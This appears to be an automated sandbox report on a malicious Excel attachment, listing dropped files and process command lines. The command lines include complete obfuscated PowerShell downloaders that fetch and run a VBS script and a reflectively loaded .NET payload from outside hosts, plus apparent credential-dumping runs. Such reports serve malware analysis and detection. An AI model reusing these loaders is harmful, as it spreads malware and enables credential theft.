IOC Report
A & C Metrology OC 545714677889Materiale.xls

loading gif

Files

File Path
Type
Category
Malicious
A & C Metrology OC 545714677889Materiale.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Oct 30 17:50:53 2024, Security: 1
initial sample
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ernashgetmebackwithgoodnewswhichgrreatthings[1].hta
HTML document, ASCII text, with very long lines (65536), with no line terminators
modified
 malicious
C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
 malicious
C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
 malicious
C:\Users\user\Desktop\A & C Metrology OC 545714677889Materiale.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 31 04:14:13 2024, Security: 1
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\picturewithgreatnewswithgoodthingsonbestplace[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\180B9CB3.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\368CC4FA.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3D9573FB.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AA02F62.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FE5C0.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\1py0mh1i.eyz.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\1vaxlmbz.scv.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\24gpjrna.isx.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\2zk1p2gc.epx.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\4txanzkw.1kp.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\5h3o10cv.cdk.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\RES7A10.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 31 04:14:03 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\RESC85F.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 31 04:14:23 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\aboyzkdo.yf1.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\bhv2DF4.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x03840a1c, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\bhv417.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x03840a1c, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\ccpqkvncszlcdyhupbgkfnqpbhfycgj
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\fds3zcto.zzs.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\l3vldqo2.q3p.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\legehkn5.guh.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ooofmq3d.gjy.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\revod450\CSCA06B8A6F8CBF4D28B1CF456BD67905.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\revod450\revod450.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (347)
dropped
C:\Users\user\AppData\Local\Temp\revod450\revod450.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\revod450\revod450.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\revod450\revod450.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\ro2x0ujm.yqd.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\tcqnvyec.bvj.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\u3qqruit.gii.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\v4pa1vwr.u0p.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\wjfjxygv.fk5.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\xcygtrxb\CSC209022CC148748BB8468879EDEB89E99.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (347)
dropped
C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\~DF461EF3F8D7EFD076.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DF523C1B826206368A.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DF5E72911EE0F8EE5F.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFE74F55484018A372.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\Desktop\7B130000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 31 04:14:13 2024, Security: 1
dropped
C:\Users\user\Desktop\7B130000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
There are 41 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
 malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE
 malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline"
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE
 malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\revod450\revod450.cmdline"
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ccpqkvncszlcdyhupbgkfnqpbhfycgj"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
